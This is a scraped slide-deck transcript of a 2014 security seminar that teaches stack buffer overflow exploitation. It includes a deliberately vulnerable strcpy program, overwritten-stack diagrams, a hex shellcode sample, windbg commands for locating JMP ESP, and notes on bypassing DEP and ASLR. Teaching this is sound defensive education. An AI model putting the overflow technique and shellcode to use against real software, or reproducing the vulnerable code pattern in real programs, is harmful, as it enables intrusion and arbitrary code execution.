seminar hacking & security analysis
DESCRIPTION
Seminar security analyst, vulnerability analysis. UIN 21 Jun 2014TRANSCRIPT
![Page 1: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/1.jpg)
Hacking | Information Security Analysis
HackingSecurity Analysis
-- Build security with creativityDanang Heriyadi ([email protected])
![Page 2: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/2.jpg)
Hacking | Information Security Analysis
Hello World
![Page 3: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/3.jpg)
Hacking | Information Security Analysis
Today
Hacking Incidents
Assets
Vulnerability Analysis
![Page 4: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/4.jpg)
Hacking | Information Security Analysis
Top 3 - Hacking in action
Cyber Spying
Fraud or Forgery
Illegal Access
![Page 5: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/5.jpg)
Hacking | Information Security Analysis
Cyber Spying
![Page 6: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/6.jpg)
Hacking | Information Security Analysis
Fraud or Forgery
![Page 7: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/7.jpg)
Hacking | Information Security Analysis
Illegal Access
![Page 8: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/8.jpg)
Hacking | Information Security Analysis
How they can do that?
• Sensitive information disclosure– Search Engine (google, bing, yahoo)– Magazine– etc
• Social engineering attacks– The knowledge and attitude members of an organization possess
regarding the protection of the information assets.
• Vulnerability on your system– Attacker exploit the vulnerability to gaining access.
![Page 9: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/9.jpg)
Hacking | Information Security Analysis
Google Hacking
![Page 10: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/10.jpg)
Hacking | Information Security Analysis
What are you trying to protect?
• Senstive personal data• Your network infrastructure• Your assets
![Page 11: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/11.jpg)
Hacking | Information Security Analysis
Common Vulnerabilities
• Web– XSS– Database Injection– OS command Injection– Local File Disclosure– File Inclusion– Path Disclosure– CSRF– Dir. Traversal
• Low level Vulnerability– Stack Overflow– Heap Overflow– Integer Overflow– Memory Corruption– Etc
![Page 12: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/12.jpg)
Hacking | Information Security Analysis
Buffer Overflow
• Low level vulnerability– Stack Overflow ( Very easy )– Integer Overflow ( easy )– Heap Overflow ( medium ) – Memory Corruption ( easy - medium )– .....
![Page 13: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/13.jpg)
Hacking | Information Security Analysis
Impact of buffer overflow
• Application– Crash and terminated– Arbitary code execution
• Operating System– Crash, hang, or reboot– Arbitary code execution– Privilege escalation
![Page 14: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/14.jpg)
Hacking | Information Security Analysis
Basic Knowledge
• CPU Register– EAX EDI– EBX ESI– ECX EBP– EDX ESP– EIP
![Page 15: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/15.jpg)
Hacking | Information Security Analysis
Basic Knowledge
• Assembly Language– mov ret– push– pop– shr– jmp
![Page 16: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/16.jpg)
Hacking | Information Security Analysis
WindowsMemory Allocation
0x00000000
0xFFFFFFFF
Stack
Heap
Program Image• PE Header• .text, .rdata, .data, ...
Can be allocated as heap or stack for other threads
DLLPEB
Shared User Page
No Access
0x00400000
0x7FFE10000x7FFE00000x7FFDF000
![Page 17: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/17.jpg)
Hacking | Information Security Analysis
C++ from beginner
#include <stdio.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
![Page 18: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/18.jpg)
Hacking | Information Security Analysis
Run it !!
![Page 19: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/19.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
CPU Register (Example)• EIP = 0x01234567 => address of main()
0x00000000
Top of Stack
![Page 20: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/20.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
CPU Register (Example)• EIP = 0x01234571 => address of vulnerable()
![Page 21: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/21.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
CPU Register (Example)• EIP = 0x01234585 => stack_data[128]
![Page 22: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/22.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
CPU Register (Example)• EIP = 0x01234544 => address of strcpy()
<Space for stack_data>
ESP<ptr to argv[1]>
Saved EBP 0x00112233
Saved EIP 0x00112237
![Page 23: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/23.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ABCD
ESP<ptr to argv[1]>
Saved EBP 0x00112233
Saved EIP 0x00112237
CPU Register (Example)• EIP = 0x01234548 => address of printf()
![Page 24: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/24.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ESP<ptr to argv[1]>
Saved EBP 0x00112233
Saved EIP 0x00112237
CPU Register (Example)• EIP = 0x01234552 => restore saved EIP -> EIP
![Page 25: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/25.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ESP<ptr to argv[1]>
CPU Register (Example)• EIP = 0x01234599 => exit(0)
![Page 26: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/26.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
![Page 27: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/27.jpg)
Hacking | Information Security Analysis
Stack Allocation(Stack Overflow)
![Page 28: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/28.jpg)
Hacking | Information Security Analysis
Stack Allocation(Stack Overflow)
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
CPU Register (Example)• EIP = 0x012345 => address of strcpy()
<Space for stack_data>
ESP<ptr to argv[1]>
Saved EBP 0x00112233
Saved EIP 0x00112237
![Page 29: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/29.jpg)
Hacking | Information Security Analysis
Stack Allocation(Stack Overflow)
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
414141414141414141414141414141414141414141414141414141414141414141414141
Saved EBP 0x41414141
Saved EIP 0x41414141
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
CPU Register (Example)• EIP = 0x01234548 => address of printf()
![Page 30: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/30.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
Saved EBP 0x41414141
Saved EIP 0x41414141
CPU Register (Example)• EIP = 0x41414141 => restore saved EIP -> EIP
![Page 31: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/31.jpg)
Hacking | Information Security Analysis
Stack Allocation
#include <stdio.h>#include <string.h>
void vulnerable(char *Buffer){char stack_data[128];strcpy (stack_data, Buffer);printf( " Isi variabel stack_data : %s ", stack_data);
}int main(int argc, char **argv){
vulnerable(argv[1]);return 0;
}
0x00000000
Top of Stack
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
CPU Register (Example)• EIP = 0x41414141 Access Volation when executing 0x41414141
![Page 32: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/32.jpg)
Hacking | Information Security Analysis
Stack Exploitation
![Page 33: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/33.jpg)
Hacking | Information Security Analysis
Stack Exploitation(Stack Overflow)
0x00000000
Top of Stack
414141414141414141414141414141414141414141414141414141414141414141414141
Saved EBP 0x41414141
Saved EIP 0x41414141
ESP414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
0x001122330x00112237
0x00000000
Top of Stack
414141414141414141414141414141414141414141414141414141414141414141414141
Saved EBP 0x41414141
Saved EIP 0x80221122
ESP31c031db31c931d2eb16bfea07457e50535150ffd75950684141414189e3ebeae8f0ffffff48
656c6c6f776f726c64
0x001122330x00112237
Shellcode
Address for JMP ESP
![Page 34: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/34.jpg)
Hacking | Information Security Analysis
Shellcode
• Small piece of code used as the payload in the exploitation of a software vulnerability
• Why is our shellcode not working?– bad character– Big size
![Page 35: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/35.jpg)
Hacking | Information Security Analysis
• Fuzzing Technique– Detecting Buffer Overflow– Find offset to overwrite EBP and EIP register
• Find -> JMP ESPwindbg command > lm muser32windbg command > s -b 7xxxxx 7xxxxx ff e4
• Generate shellcode– msfvenom– manual :-P
• Finishing Exploit
Stack Exploitation(Stack Overflow)
![Page 36: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/36.jpg)
Hacking | Information Security Analysis
Mitigation and Technique
• Windows XP– Hardware DEP -> ROP shellcode
• Windows Vistra– ASLR -> Static address on shared data memory– DEP -> ROP shellcode
• Windows 7– ASLR + DEP -> ROP / JIT ROP / JIT ROP Spraying
![Page 37: Seminar Hacking & Security Analysis](https://reader033.vdocuments.us/reader033/viewer/2022060110/555c446ed8b42a2c068b4fc6/html5/thumbnails/37.jpg)
Hacking | Information Security Analysis
Mitigation and Technique
• Windows 8– ASLR + DEP (new) -> ROP / JIT ROP